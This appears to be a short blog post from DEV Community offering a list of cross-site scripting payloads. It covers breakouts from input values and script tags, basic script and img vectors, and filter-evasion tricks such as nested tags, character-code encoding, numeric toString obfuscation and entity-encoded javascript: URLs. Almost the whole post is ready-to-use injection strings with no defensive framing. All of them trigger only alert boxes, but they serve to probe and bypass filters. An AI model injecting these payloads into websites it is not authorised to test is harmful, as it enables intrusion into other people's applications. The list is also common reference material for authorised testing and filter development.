Useful XSS Payloads

#cybersecurity #security #web3

In this post i will show top and useful xss payloads in 2022. i found xss vulnerabilities in many web apps with some of them below.

You can use payloads below when you are dealing with a injection that goes inside the value of a input:

\"-alert(1)//
\'-alert(1)//
%26apos;-alert(1)-%26apos
'-alert(1)-'

Use these payloads when you are injecting inside a script tag

</script><img/src/onerror=alert(1)>
<a href="javascript:var a='&apos;-alert(1)-&apos;'">

And we have some common payloads here

// Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">

// Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

Find Security and Bug Bounty Books in my telegram channel ==>

t.me

DEV Community

Useful XSS Payloads

In this post i will show top and useful xss payloads in 2022. i found xss vulnerabilities in many web apps with some of them below.

Top comments (0)

Read next

Why using a passphrase to secure your SSH key ?

How To Detect Cyber Injection Attack With Artificial intelligence

PicoCTF 2024: packer

7 Frameworks, One SAML Jackson - Your Open Source Single Sign-On Solution